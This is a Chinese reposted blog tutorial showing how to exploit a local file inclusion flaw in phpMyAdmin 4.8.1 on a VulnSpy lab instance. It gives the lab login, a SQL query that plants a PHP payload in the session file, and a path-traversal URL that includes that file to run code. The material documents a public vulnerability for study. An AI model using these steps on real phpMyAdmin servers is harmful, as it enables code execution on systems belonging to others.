phpMyAdmin 4.8.x(最新版) 本地文件包含漏洞利用

本文转载自:phpMyAdmin 4.8.x LFI Exploit -http://blog.vulnspy.com/2018/06/21/phpMyAdmin-4-8-x-LFI-Exploit/

今天ChaMd5安全团队公开了一个phpMyAdmin最新版中的本地文件包含漏洞:phpmyadmin4.8.1后台getshell。该漏洞利用不要求root帐号,只需能够登录 phpMyAdmin 便能够利用。

在这篇文章中我们将使用VulnSpy的在线 phpMyAdmin 环境来演示该漏洞的利用。

VulnSpy 在线 phpMyAdmin 环境地址:http://www.vulnspy.com/phpmyadmin-4.8.1/

漏洞细节

参照ChaMd5安全团队发布的文章:phpmyadmin4.8.1后台getshell

漏洞利用

因为原文中包含数据库文件可能由于文件权限或者帐号权限不足而无法利用,这里我们将使用另外一种方式来利用该文件包含漏洞,即包含session文件。

1. 进入VulnSpy 在线 phpMyAdmin 环境地址,点击 Start to Hack ,跳转到VSPlate

2. 等待载入设置后,点击 GO 按钮开启实验

3. 实验创建完成后,点击演示地址进入实验

4. 使用帐号 root ,密码 toor 登录 phpMyAdmin

5. 点击顶部导航栏中的SQL按钮,执行SQL查询

1

select '<?php phpinfo();exit;?>'

6. 获取自己的SESSION ID

你的 SESSION ID 为 Cookie 中的 phpMyAdmin 项。

这样对应的SESSION文件为/var/lib/php/sessions/sess_你的SESSION ID

7. 包含SESSION文件,成功利用该漏洞

1

http://1a23009a9c9e959d9c70932bb9f634eb.vsplate.me/index.php?target=db_sql.php%253f/../../../../../../../../var/lib/php/sessions/sess_11njnj4253qq93vjm9q93nvc7p2lq82k

原文链接:http://blog.vulnspy.com/2018/06/21/phpMyAdmin-4-8-x-LFI-Exploit/

发表于

我来说两句

0 条评论
登录 后参与评论

相关文章

来自专栏沈唁志

自定义 WordPress 数据库连接出错页面

1515
来自专栏向治洪

React native开发中常见的错误

react native环境搭建请移步:react native环境搭建 这里说说react native创建完成之后,运行中出现的常见问题, 问题1: jav...

2656
来自专栏龙首琴剑庐

VM安装CentOS6-相关NAT上网&VM-tools安装

安装CentOS步骤略。其中注意:安装默认选择Minimal,可以选择Desktop,或者选择现在自定义,添加一些必要的组件,注意如果选择以后自定义,虚拟机可能...

2815
来自专栏DannyHoo的专栏

在Xcode8上安装插件之后闪退

版权声明:本文为博主原创文章,未经博主允许不得转载。 https://blog.csdn.net/u010105969/article/details/...

772
来自专栏电光石火

推荐几款比较好看HTML admin后台模板

H+是一个完全响应式,基于Bootstrap3.3.6最新版本开发的扁平化主题,她采用了主流的左右两栏式布局,使用了Html5+CSS3等现代技术,她提供了...

1.3K1
来自专栏前端开发

PWA介绍及快速上手搭建一个PWA应用

一个新的前端技术,PWA( 全称:Progressive Web App )也就是说这是个渐进式的网页应用程序。

38313
来自专栏mukekeheart的iOS之旅

iOS工具——Xcode9无证书真机调试

  入坑iOS开发这么久,一直都是在模拟器上运行,公司的项目也都有公司的开发者账号进行真机调试。但是很多时候在网上download一些demo想在真机上运行看一...

56410
来自专栏数说工作室

【SAS Says】基础篇:SAS软件入门(下)

特别说明:本节【SAS Says】基础篇:SAS软件入门(下),用的是数说君学习《The little SAS book》时的中文笔记,我们认为这是打基础的最好...

3234
来自专栏iOSDevLog

SketchTool目录

3397
来自专栏Jerry的SAP技术分享

使用nodejs消费SAP Cloud for Customer上的Web service

Jerry在公众号文章C4C和微信集成系列教程里曾经使用nodejs去消费C4C提供的标准webservice。

1822

扫码关注云+社区